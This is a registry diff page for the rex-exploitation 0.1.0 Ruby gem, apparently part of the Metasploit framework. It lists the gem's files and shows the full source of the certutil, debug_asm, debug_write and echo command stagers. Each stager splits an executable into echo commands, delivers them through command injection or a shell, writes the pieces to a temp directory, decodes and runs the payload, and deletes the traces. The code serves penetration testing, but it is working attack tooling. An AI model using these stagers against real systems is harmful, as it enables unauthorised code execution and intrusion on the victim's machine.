rex-exploitation 0.1.0
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- checksums.yaml +7 -0
- checksums.yaml.gz.sig +0 -0
- data.tar.gz.sig +1 -0
- data/.gitignore +9 -0
- data/.rspec +2 -0
- data/.travis.yml +5 -0
- data/CODE_OF_CONDUCT.md +74 -0
- data/Gemfile +4 -0
- data/README.md +33 -0
- data/Rakefile +6 -0
- data/bin/console +14 -0
- data/bin/setup +8 -0
- data/data/exploits/cmdstager/debug_asm +91 -0
- data/data/exploits/cmdstager/debug_write +819 -0
- data/data/exploits/cmdstager/vbs_b64 +40 -0
- data/data/exploits/cmdstager/vbs_b64_adodb +50 -0
- data/data/exploits/cmdstager/vbs_b64_noquot +49 -0
- data/data/exploits/cmdstager/vbs_b64_sleep +41 -0
- data/data/js/detect/ie_addons.js +89 -0
- data/data/js/detect/misc_addons.js +157 -0
- data/data/js/detect/os.js +831 -0
- data/data/js/memory/explib2/lib/explib2.js +426 -0
- data/data/js/memory/explib2/payload/drop_exec.js +33 -0
- data/data/js/memory/explib2/payload/exec.js +10 -0
- data/data/js/memory/heap_spray.js +17 -0
- data/data/js/memory/heaplib2.js +192 -0
- data/data/js/memory/mstime_malloc.js +31 -0
- data/data/js/memory/property_spray.js +38 -0
- data/data/js/network/ajax_download.js +18 -0
- data/data/js/network/ajax_post.js +18 -0
- data/data/js/network/xhr_shim.js +15 -0
- data/data/js/utils/base64.js +126 -0
- data/data/ropdb/flash.xml +80 -0
- data/data/ropdb/hxds.xml +66 -0
- data/data/ropdb/java.xml +33 -0
- data/data/ropdb/msvcrt.xml +71 -0
- data/data/ropdb/reader.xml +132 -0
- data/data/ropdb/samba.xml +436 -0
- data/data/ropdb/stagefright.xml +225 -0
- data/lib/rex/exploitation.rb +7 -0
- data/lib/rex/exploitation/cmdstager.rb +11 -0
- data/lib/rex/exploitation/cmdstager/base.rb +189 -0
- data/lib/rex/exploitation/cmdstager/bourne.rb +118 -0
- data/lib/rex/exploitation/cmdstager/certutil.rb +114 -0
- data/lib/rex/exploitation/cmdstager/debug_asm.rb +139 -0
- data/lib/rex/exploitation/cmdstager/debug_write.rb +133 -0
- data/lib/rex/exploitation/cmdstager/echo.rb +166 -0
- data/lib/rex/exploitation/cmdstager/printf.rb +121 -0
- data/lib/rex/exploitation/cmdstager/tftp.rb +70 -0
- data/lib/rex/exploitation/cmdstager/vbs.rb +125 -0
- data/lib/rex/exploitation/egghunter.rb +423 -0
- data/lib/rex/exploitation/encryptjs.rb +79 -0
- data/lib/rex/exploitation/heaplib.js.b64 +331 -0
- data/lib/rex/exploitation/heaplib.rb +107 -0
- data/lib/rex/exploitation/js.rb +6 -0
- data/lib/rex/exploitation/js/detect.rb +70 -0
- data/lib/rex/exploitation/js/memory.rb +80 -0
- data/lib/rex/exploitation/js/network.rb +83 -0
- data/lib/rex/exploitation/js/utils.rb +32 -0
- data/lib/rex/exploitation/jsobfu.rb +17 -0
- data/lib/rex/exploitation/obfuscatejs.rb +336 -0
- data/lib/rex/exploitation/omelet.rb +321 -0
- data/lib/rex/exploitation/opcodedb.rb +819 -0
- data/lib/rex/exploitation/ropdb.rb +190 -0
- data/lib/rex/exploitation/seh.rb +93 -0
- data/lib/rex/exploitation/version.rb +5 -0
- data/rex-exploitation.gemspec +35 -0
- metadata +298 -0
- metadata.gz.sig +0 -0
@@ -0,0 +1,114 @@
|
|
1
|
+
# -*- coding: binary -*-
|
2
|
+
|
3
|
+
require 'rex/text'
|
4
|
+
require 'rex/arch'
|
5
|
+
|
6
|
+
module Rex
|
7
|
+
module Exploitation
|
8
|
+
|
9
|
+
###
|
10
|
+
#
|
11
|
+
# This class provides the ability to create a sequence of commands from an executable.
|
12
|
+
# When this sequence is ran via command injection or a shell, the resulting exe will
|
13
|
+
# be written to disk and executed.
|
14
|
+
#
|
15
|
+
# This particular version uses Windows certutil to base64 decode a file,
|
16
|
+
# created via echo >>, and decode it to the final binary.
|
17
|
+
#
|
18
|
+
#
|
19
|
+
# Written by xistence
|
20
|
+
# Original discovery by @mattifestation - https://gist.github.com/mattifestation/47f9e8a431f96a266522
|
21
|
+
#
|
22
|
+
###
|
23
|
+
|
24
|
+
class CmdStagerCertutil < CmdStagerBase
|
25
|
+
|
26
|
+
def initialize(exe)
|
27
|
+
super
|
28
|
+
|
29
|
+
@var_encoded = Rex::Text.rand_text_alpha(5)
|
30
|
+
@var_decoded = Rex::Text.rand_text_alpha(5)
|
31
|
+
@decoder = nil # filled in later
|
32
|
+
end
|
33
|
+
|
34
|
+
|
35
|
+
# Override just to set the extra byte count
|
36
|
+
# @param opts [Array] The options to generate the command line
|
37
|
+
# @return [Array] The complete command line
|
38
|
+
def generate_cmds(opts)
|
39
|
+
# Set the start/end of the commands here (vs initialize) so we have @tempdir
|
40
|
+
@cmd_start = "echo "
|
41
|
+
@cmd_end = ">>#{@tempdir}#{@var_encoded}.b64"
|
42
|
+
xtra_len = @cmd_start.length + @cmd_end.length + 1
|
43
|
+
opts.merge!({ :extra => xtra_len })
|
44
|
+
super
|
45
|
+
end
|
46
|
+
|
47
|
+
|
48
|
+
# Simple base64 encoder for the executable
|
49
|
+
# @param opts [Array] The options to generate the command line
|
50
|
+
# @return [String] Base64 encoded executable
|
51
|
+
def encode_payload(opts)
|
52
|
+
Rex::Text.encode_base64(@exe)
|
53
|
+
end
|
54
|
+
|
55
|
+
|
56
|
+
# Combine the parts of the encoded file with the stuff that goes
|
57
|
+
# before / after it.
|
58
|
+
# @param parts [Array] Splitted commands
|
59
|
+
# @param opts [Array] The options to generate the command line
|
60
|
+
# @return [Array] The command line
|
61
|
+
def parts_to_commands(parts, opts)
|
62
|
+
|
63
|
+
cmds = []
|
64
|
+
parts.each do |p|
|
65
|
+
cmd = ''
|
66
|
+
cmd << @cmd_start
|
67
|
+
cmd << p
|
68
|
+
cmd << @cmd_end
|
69
|
+
cmds << cmd
|
70
|
+
end
|
71
|
+
|
72
|
+
cmds
|
73
|
+
end
|
74
|
+
|
75
|
+
|
76
|
+
# Generate the commands that will decode the file we just created
|
77
|
+
# @param opts [Array] The options to generate the command line
|
78
|
+
# @return [Array] The certutil Base64 decoder part of the command line
|
79
|
+
def generate_cmds_decoder(opts)
|
80
|
+
|
81
|
+
cmds = []
|
82
|
+
cmds << "certutil -decode #{@tempdir}#{@var_encoded}.b64 #{@tempdir}#{@var_decoded}.exe"
|
83
|
+
return cmds
|
84
|
+
end
|
85
|
+
|
86
|
+
|
87
|
+
# We override compress commands just to stick in a few extra commands
|
88
|
+
# last second..
|
89
|
+
# @param cmds [Array] Complete command line
|
90
|
+
# @param opts [Array] Extra options for command line generation
|
91
|
+
# @return [Array] The complete command line including cleanup
|
92
|
+
def compress_commands(cmds, opts)
|
93
|
+
# Make it all happen
|
94
|
+
cmds << "#{@tempdir}#{@var_decoded}.exe"
|
95
|
+
|
96
|
+
# Clean up after unless requested not to..
|
97
|
+
if (not opts[:nodelete])
|
98
|
+
cmds << "del #{@tempdir}#{@var_encoded}.b64"
|
99
|
+
# NOTE: We won't be able to delete the exe while it's in use.
|
100
|
+
end
|
101
|
+
|
102
|
+
super
|
103
|
+
end
|
104
|
+
|
105
|
+
# Windows uses & to concat strings
|
106
|
+
#
|
107
|
+
# @return [String] Concat operator
|
108
|
+
def cmd_concat_operator
|
109
|
+
" & "
|
110
|
+
end
|
111
|
+
|
112
|
+
end
|
113
|
+
end
|
114
|
+
end
|
@@ -0,0 +1,139 @@
|
|
1
|
+
# -*- coding: binary -*-
|
2
|
+
|
3
|
+
require 'rex/text'
|
4
|
+
require 'rex/arch'
|
5
|
+
|
6
|
+
module Rex
|
7
|
+
module Exploitation
|
8
|
+
|
9
|
+
###
|
10
|
+
#
|
11
|
+
# This class provides the ability to create a sequence of commands from an executable.
|
12
|
+
# When this sequence is ran via command injection or a shell, the resulting exe will
|
13
|
+
# be written to disk and executed.
|
14
|
+
#
|
15
|
+
# This particular version uses debug.exe to assemble a small COM file. The COM will
|
16
|
+
# take a hex-ascii file, created via echo >>, and decode it to the final binary.
|
17
|
+
#
|
18
|
+
# Requires: debug.exe
|
19
|
+
#
|
20
|
+
# Written by Joshua J. Drake
|
21
|
+
#
|
22
|
+
###
|
23
|
+
|
24
|
+
class CmdStagerDebugAsm < CmdStagerBase
|
25
|
+
|
26
|
+
def initialize(exe)
|
27
|
+
super
|
28
|
+
|
29
|
+
@var_decoder_asm = Rex::Text.rand_text_alpha(8) + ".dat"
|
30
|
+
@var_decoder_com = Rex::Text.rand_text_alpha(8) + ".com"
|
31
|
+
@var_payload_in = Rex::Text.rand_text_alpha(8) + ".dat"
|
32
|
+
@var_payload_out = Rex::Text.rand_text_alpha(8) + ".exe"
|
33
|
+
@decoder = nil # filled in later
|
34
|
+
end
|
35
|
+
|
36
|
+
|
37
|
+
#
|
38
|
+
# Override just to set the extra byte count
|
39
|
+
#
|
40
|
+
def generate_cmds(opts)
|
41
|
+
# Set the start/end of the commands here (vs initialize) so we have @tempdir
|
42
|
+
@cmd_start = "echo "
|
43
|
+
@cmd_end = ">>#{@tempdir}#{@var_payload_in}"
|
44
|
+
xtra_len = @cmd_start.length + @cmd_end.length + 1
|
45
|
+
opts.merge!({ :extra => xtra_len })
|
46
|
+
super
|
47
|
+
end
|
48
|
+
|
49
|
+
|
50
|
+
#
|
51
|
+
# Simple hex encoding...
|
52
|
+
#
|
53
|
+
def encode_payload(opts)
|
54
|
+
ret = @exe.unpack('H*')[0]
|
55
|
+
end
|
56
|
+
|
57
|
+
|
58
|
+
#
|
59
|
+
# Combine the parts of the encoded file with the stuff that goes
|
60
|
+
# before / after it.
|
61
|
+
#
|
62
|
+
def parts_to_commands(parts, opts)
|
63
|
+
|
64
|
+
cmds = []
|
65
|
+
parts.each do |p|
|
66
|
+
cmd = ''
|
67
|
+
cmd << @cmd_start
|
68
|
+
cmd << p
|
69
|
+
cmd << @cmd_end
|
70
|
+
cmds << cmd
|
71
|
+
end
|
72
|
+
|
73
|
+
cmds
|
74
|
+
end
|
75
|
+
|
76
|
+
|
77
|
+
#
|
78
|
+
# Generate the commands that will decode the file we just created
|
79
|
+
#
|
80
|
+
def generate_cmds_decoder(opts)
|
81
|
+
|
82
|
+
# Allow decoder stub override (needs to input base64 and output bin)
|
83
|
+
@decoder = opts[:decoder] if (opts[:decoder])
|
84
|
+
|
85
|
+
# Read the decoder data file
|
86
|
+
f = File.new(@decoder, "rb")
|
87
|
+
decoder = f.read(f.stat.size)
|
88
|
+
f.close
|
89
|
+
|
90
|
+
# Replace variables
|
91
|
+
decoder.gsub!(/decoder_stub/, "#{@tempdir}#{@var_decoder_asm}")
|
92
|
+
decoder.gsub!(/h2b\.com/, "#{@tempdir}#{@var_decoder_com}")
|
93
|
+
# NOTE: these two filenames MUST 8+3 chars long.
|
94
|
+
decoder.gsub!(/testfile\.dat/, "#{@var_payload_in}")
|
95
|
+
decoder.gsub!(/testfile\.out/, "#{@var_payload_out}")
|
96
|
+
|
97
|
+
# Split it apart by the lines
|
98
|
+
decoder.split("\n")
|
99
|
+
end
|
100
|
+
|
101
|
+
|
102
|
+
#
|
103
|
+
# We override compress commands just to stick in a few extra commands
|
104
|
+
# last second..
|
105
|
+
#
|
106
|
+
def compress_commands(cmds, opts)
|
107
|
+
# Convert the debug script to an executable...
|
108
|
+
cvt_cmd = ''
|
109
|
+
if (@tempdir != '')
|
110
|
+
cvt_cmd << "cd %TEMP% && "
|
111
|
+
end
|
112
|
+
cvt_cmd << "debug < #{@tempdir}#{@var_decoder_asm}"
|
113
|
+
cmds << cvt_cmd
|
114
|
+
|
115
|
+
# Convert the encoded payload...
|
116
|
+
cmds << "#{@tempdir}#{@var_decoder_com}"
|
117
|
+
|
118
|
+
# Make it all happen
|
119
|
+
cmds << "start #{@tempdir}#{@var_payload_out}"
|
120
|
+
|
121
|
+
# Clean up after unless requested not to..
|
122
|
+
if (not opts[:nodelete])
|
123
|
+
cmds << "del #{@tempdir}#{@var_decoder_asm}"
|
124
|
+
cmds << "del #{@tempdir}#{@var_decoder_com}"
|
125
|
+
cmds << "del #{@tempdir}#{@var_payload_in}"
|
126
|
+
# XXX: We won't be able to delete the payload while it is running..
|
127
|
+
end
|
128
|
+
|
129
|
+
super
|
130
|
+
end
|
131
|
+
|
132
|
+
# Windows uses & to concat strings
|
133
|
+
def cmd_concat_operator
|
134
|
+
" & "
|
135
|
+
end
|
136
|
+
|
137
|
+
end
|
138
|
+
end
|
139
|
+
end
|
@@ -0,0 +1,133 @@
|
|
1
|
+
# -*- coding: binary -*-
|
2
|
+
|
3
|
+
require 'rex/text'
|
4
|
+
require 'rex/arch'
|
5
|
+
|
6
|
+
module Rex
|
7
|
+
module Exploitation
|
8
|
+
|
9
|
+
###
|
10
|
+
#
|
11
|
+
# This class provides the ability to create a sequence of commands from an executable.
|
12
|
+
# When this sequence is ran via command injection or a shell, the resulting exe will
|
13
|
+
# be written to disk and executed.
|
14
|
+
#
|
15
|
+
# This particular version uses debug.exe to write a small .NET binary. That binary will
|
16
|
+
# take a hex-ascii file, created via echo >>, and decode it to the final binary.
|
17
|
+
#
|
18
|
+
# Requires: .NET, debug.exe
|
19
|
+
#
|
20
|
+
###
|
21
|
+
|
22
|
+
class CmdStagerDebugWrite < CmdStagerBase
|
23
|
+
|
24
|
+
def initialize(exe)
|
25
|
+
super
|
26
|
+
|
27
|
+
@var_bypass = Rex::Text.rand_text_alpha(8)
|
28
|
+
@var_payload = Rex::Text.rand_text_alpha(8)
|
29
|
+
@decoder = nil # filled in later
|
30
|
+
end
|
31
|
+
|
32
|
+
|
33
|
+
#
|
34
|
+
# Override just to set the extra byte count
|
35
|
+
#
|
36
|
+
def generate_cmds(opts)
|
37
|
+
# Set the start/end of the commands here (vs initialize) so we have @tempdir
|
38
|
+
@cmd_start = "echo "
|
39
|
+
@cmd_end = ">>#{@tempdir}#{@var_payload}"
|
40
|
+
xtra_len = @cmd_start.length + @cmd_end.length + 1
|
41
|
+
opts.merge!({ :extra => xtra_len })
|
42
|
+
super
|
43
|
+
end
|
44
|
+
|
45
|
+
|
46
|
+
#
|
47
|
+
# Simple hex encoding...
|
48
|
+
#
|
49
|
+
def encode_payload(opts)
|
50
|
+
@exe.unpack('H*')[0]
|
51
|
+
end
|
52
|
+
|
53
|
+
|
54
|
+
#
|
55
|
+
# Combine the parts of the encoded file with the stuff that goes
|
56
|
+
# before / after it.
|
57
|
+
#
|
58
|
+
def parts_to_commands(parts, opts)
|
59
|
+
|
60
|
+
cmds = []
|
61
|
+
parts.each do |p|
|
62
|
+
cmd = ''
|
63
|
+
cmd << @cmd_start
|
64
|
+
cmd << p
|
65
|
+
cmd << @cmd_end
|
66
|
+
cmds << cmd
|
67
|
+
end
|
68
|
+
|
69
|
+
cmds
|
70
|
+
end
|
71
|
+
|
72
|
+
|
73
|
+
#
|
74
|
+
# Generate the commands that will decode the file we just created
|
75
|
+
#
|
76
|
+
def generate_cmds_decoder(opts)
|
77
|
+
|
78
|
+
# Allow decoder stub override (needs to input base64 and output bin)
|
79
|
+
@decoder = opts[:decoder] if (opts[:decoder])
|
80
|
+
|
81
|
+
# Read the decoder data file
|
82
|
+
f = File.new(@decoder, "rb")
|
83
|
+
decoder = f.read(f.stat.size)
|
84
|
+
f.close
|
85
|
+
|
86
|
+
# Replace variables
|
87
|
+
decoder.gsub!(/decoder_stub/, "#{@tempdir}#{@var_bypass}")
|
88
|
+
|
89
|
+
# Split it apart by the lines
|
90
|
+
decoder.split("\n")
|
91
|
+
end
|
92
|
+
|
93
|
+
|
94
|
+
#
|
95
|
+
# We override compress commands just to stick in a few extra commands
|
96
|
+
# last second..
|
97
|
+
#
|
98
|
+
def compress_commands(cmds, opts)
|
99
|
+
# Convert the debug script to an executable...
|
100
|
+
cvt_cmd = ''
|
101
|
+
if (@tempdir != '')
|
102
|
+
cvt_cmd << "cd %TEMP% && "
|
103
|
+
end
|
104
|
+
cvt_cmd << "debug < #{@tempdir}#{@var_bypass}"
|
105
|
+
cmds << cvt_cmd
|
106
|
+
|
107
|
+
# Rename the resulting binary
|
108
|
+
cmds << "move #{@tempdir}#{@var_bypass}.bin #{@tempdir}#{@var_bypass}.exe"
|
109
|
+
|
110
|
+
# Converting the encoded payload...
|
111
|
+
cmds << "#{@tempdir}#{@var_bypass}.exe #{@tempdir}#{@var_payload}"
|
112
|
+
|
113
|
+
# Make it all happen
|
114
|
+
cmds << "start #{@tempdir}#{@var_payload}.exe"
|
115
|
+
|
116
|
+
# Clean up after unless requested not to..
|
117
|
+
if (not opts[:nodelete])
|
118
|
+
cmds << "del #{@tempdir}#{@var_bypass}.exe"
|
119
|
+
cmds << "del #{@tempdir}#{@var_payload}"
|
120
|
+
# XXX: We won't be able to delete the payload while it is running..
|
121
|
+
end
|
122
|
+
|
123
|
+
super
|
124
|
+
end
|
125
|
+
|
126
|
+
# Windows uses & to concat strings
|
127
|
+
def cmd_concat_operator
|
128
|
+
" & "
|
129
|
+
end
|
130
|
+
|
131
|
+
end
|
132
|
+
end
|
133
|
+
end
|
@@ -0,0 +1,166 @@
|
|
1
|
+
# -*- coding: binary -*-
|
2
|
+
|
3
|
+
require 'rex/text'
|
4
|
+
require 'rex/arch'
|
5
|
+
require 'shellwords'
|
6
|
+
|
7
|
+
module Rex
|
8
|
+
module Exploitation
|
9
|
+
|
10
|
+
class CmdStagerEcho < CmdStagerBase
|
11
|
+
|
12
|
+
ENCODINGS = {
|
13
|
+
'hex' => "\\\\x",
|
14
|
+
'octal' => "\\\\"
|
15
|
+
}
|
16
|
+
|
17
|
+
def initialize(exe)
|
18
|
+
super
|
19
|
+
|
20
|
+
@var_elf = Rex::Text.rand_text_alpha(5)
|
21
|
+
end
|
22
|
+
|
23
|
+
#
|
24
|
+
# Override to ensure opts[:temp] is a correct *nix path
|
25
|
+
# and initialize opts[:enc_format].
|
26
|
+
#
|
27
|
+
def generate(opts = {})
|
28
|
+
opts[:temp] = opts[:temp] || '/tmp/'
|
29
|
+
|
30
|
+
unless opts[:temp].empty?
|
31
|
+
opts[:temp].gsub!(/\\/, '/')
|
32
|
+
opts[:temp] = opts[:temp].shellescape
|
33
|
+
opts[:temp] << '/' if opts[:temp][-1,1] != '/'
|
34
|
+
end
|
35
|
+
|
36
|
+
# by default use the 'hex' encoding
|
37
|
+
opts[:enc_format] = opts[:enc_format].nil? ? 'hex' : opts[:enc_format].to_s
|
38
|
+
|
39
|
+
unless ENCODINGS.keys.include?(opts[:enc_format])
|
40
|
+
raise RuntimeError, "CmdStagerEcho - Invalid Encoding Option: #{opts[:enc_format]}"
|
41
|
+
end
|
42
|
+
|
43
|
+
super
|
44
|
+
end
|
45
|
+
|
46
|
+
#
|
47
|
+
# Override to set the extra byte count
|
48
|
+
#
|
49
|
+
def generate_cmds(opts)
|
50
|
+
# Set the start/end of the commands here (vs initialize) so we have @tempdir
|
51
|
+
@cmd_start = "echo "
|
52
|
+
unless opts[:noargs]
|
53
|
+
@cmd_start += "-en "
|
54
|
+
end
|
55
|
+
|
56
|
+
@cmd_end = ">>#{@tempdir}#{@var_elf}"
|
57
|
+
xtra_len = @cmd_start.length + @cmd_end.length
|
58
|
+
opts.merge!({ :extra => xtra_len })
|
59
|
+
|
60
|
+
@prefix = opts[:prefix] || ENCODINGS[opts[:enc_format]]
|
61
|
+
min_part_size = 5 # for both encodings
|
62
|
+
|
63
|
+
if (opts[:linemax] - opts[:extra]) < min_part_size
|
64
|
+
raise RuntimeError, "CmdStagerEcho - Not enough space for command - #{opts[:extra] + min_part_size} byte required, #{opts[:linemax]} byte available"
|
65
|
+
end
|
66
|
+
|
67
|
+
super
|
68
|
+
end
|
69
|
+
|
70
|
+
|
71
|
+
#
|
72
|
+
# Encode into a format that echo understands, where
|
73
|
+
# interpretation of backslash escapes are enabled. For
|
74
|
+
# hex, it'll look like "\\x41\\x42", and octal will be
|
75
|
+
# "\\101\\102\\5\\41"
|
76
|
+
#
|
77
|
+
def encode_payload(opts)
|
78
|
+
case opts[:enc_format]
|
79
|
+
when 'octal'
|
80
|
+
return Rex::Text.to_octal(@exe, @prefix)
|
81
|
+
else
|
82
|
+
return Rex::Text.to_hex(@exe, @prefix)
|
83
|
+
end
|
84
|
+
end
|
85
|
+
|
86
|
+
|
87
|
+
#
|
88
|
+
# Combine the parts of the encoded file with the stuff that goes
|
89
|
+
# before ("echo -en ") / after (">>file") it.
|
90
|
+
#
|
91
|
+
def parts_to_commands(parts, opts)
|
92
|
+
parts.map do |p|
|
93
|
+
cmd = ''
|
94
|
+
cmd << @cmd_start
|
95
|
+
cmd << p
|
96
|
+
cmd << @cmd_end
|
97
|
+
cmd
|
98
|
+
end
|
99
|
+
end
|
100
|
+
|
101
|
+
#
|
102
|
+
# Since the binary has been already dropped to fs, just execute and
|
103
|
+
# delete it
|
104
|
+
#
|
105
|
+
def generate_cmds_decoder(opts)
|
106
|
+
cmds = []
|
107
|
+
# Make it all happen
|
108
|
+
cmds << "chmod 777 #{@tempdir}#{@var_elf}"
|
109
|
+
#cmds << "chmod +x #{@tempdir}#{@var_elf}"
|
110
|
+
cmds << "#{@tempdir}#{@var_elf}#{' & echo' if opts[:background]}"
|
111
|
+
|
112
|
+
# Clean up after unless requested not to..
|
113
|
+
unless opts[:nodelete]
|
114
|
+
cmds << "rm -f #{@tempdir}#{@var_elf}"
|
115
|
+
end
|
116
|
+
|
117
|
+
return cmds
|
118
|
+
end
|
119
|
+
|
120
|
+
#
|
121
|
+
# Override it to ensure that the hex representation of a byte isn't cut
|
122
|
+
#
|
123
|
+
def slice_up_payload(encoded, opts)
|
124
|
+
encoded_dup = encoded.dup
|
125
|
+
|
126
|
+
parts = []
|
127
|
+
xtra_len = opts[:extra]
|
128
|
+
xtra_len ||= 0
|
129
|
+
while (encoded_dup.length > 0)
|
130
|
+
temp = encoded_dup.slice(0, (opts[:linemax] - xtra_len))
|
131
|
+
# cut the end of the part until we reach the start
|
132
|
+
# of a full byte representation "\\xYZ" or "\\YZX"
|
133
|
+
temp = fix_last_byte(temp, opts, encoded_dup)
|
134
|
+
parts << temp
|
135
|
+
encoded_dup.slice!(0, temp.length)
|
136
|
+
end
|
137
|
+
|
138
|
+
parts
|
139
|
+
end
|
140
|
+
|
141
|
+
def fix_last_byte(part, opts, remaining="")
|
142
|
+
fixed_part = part.dup
|
143
|
+
|
144
|
+
case opts[:enc_format]
|
145
|
+
when 'hex'
|
146
|
+
while (fixed_part.length > 0 && fixed_part[-5, @prefix.length] != @prefix)
|
147
|
+
fixed_part.chop!
|
148
|
+
end
|
149
|
+
when 'octal'
|
150
|
+
if remaining.length > fixed_part.length and remaining[fixed_part.length, @prefix.length] != @prefix
|
151
|
+
pos = fixed_part.rindex('\\')
|
152
|
+
pos -= 1 if fixed_part[pos-1] == '\\'
|
153
|
+
fixed_part.slice!(pos..fixed_part.length-1)
|
154
|
+
end
|
155
|
+
end
|
156
|
+
|
157
|
+
return fixed_part
|
158
|
+
end
|
159
|
+
|
160
|
+
def cmd_concat_operator
|
161
|
+
" ; "
|
162
|
+
end
|
163
|
+
|
164
|
+
end
|
165
|
+
end
|
166
|
+
end
|